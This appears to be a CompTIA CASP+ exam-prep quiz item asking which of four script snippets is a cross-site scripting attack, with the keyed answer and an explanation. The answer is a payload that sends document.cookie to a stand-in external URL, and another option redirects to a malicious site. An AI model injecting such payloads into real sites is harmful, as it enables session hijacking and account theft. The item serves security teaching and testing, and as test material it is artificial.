Enhance your CompTIA CASP+ exam readiness with our comprehensive quizzes. Sharpen your skills with detailed flashcards and multiple choice questions, each with hints and in-depth explanations. Prepare effectively for this challenging exam!


Which of the following code snippets is an example of a Cross-Site Scripting (XSS) attack?

  1. <SCRIPT>alert('XSS'); </SCRIPT>

  2. <SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie</SCRIPT>

  3. <SCRIPT>console.log('Testing'); </SCRIPT>

  4. <SCRIPT>window.location='http://malicious-site.com'</SCRIPT>

The correct answer is: <SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie</SCRIPT>

In Cross-Site Scripting (XSS) attacks, the primary goal is often to execute malicious scripts in the context of a user's session on a web application. The snippet that represents an XSS attack is the one that aims to capture a user's cookie and send it to a potentially malicious server. The correct choice does this by reading the current document's cookies and appending them to a URL that points to a script on a different server. By executing this code, an attacker could exfiltrate session cookies from an unsuspecting user, potentially leading to session hijacking or unauthorized access to the user's account.

The other options do not capture this malicious intent as effectively. For instance, one might seem benign, merely logging a message to the console, while another simply redirects the user to a webpage without stealing sensitive information. Thus, the second option (B) is specifically targeted at compromising security by capturing cookies and sending them to an unauthorized location.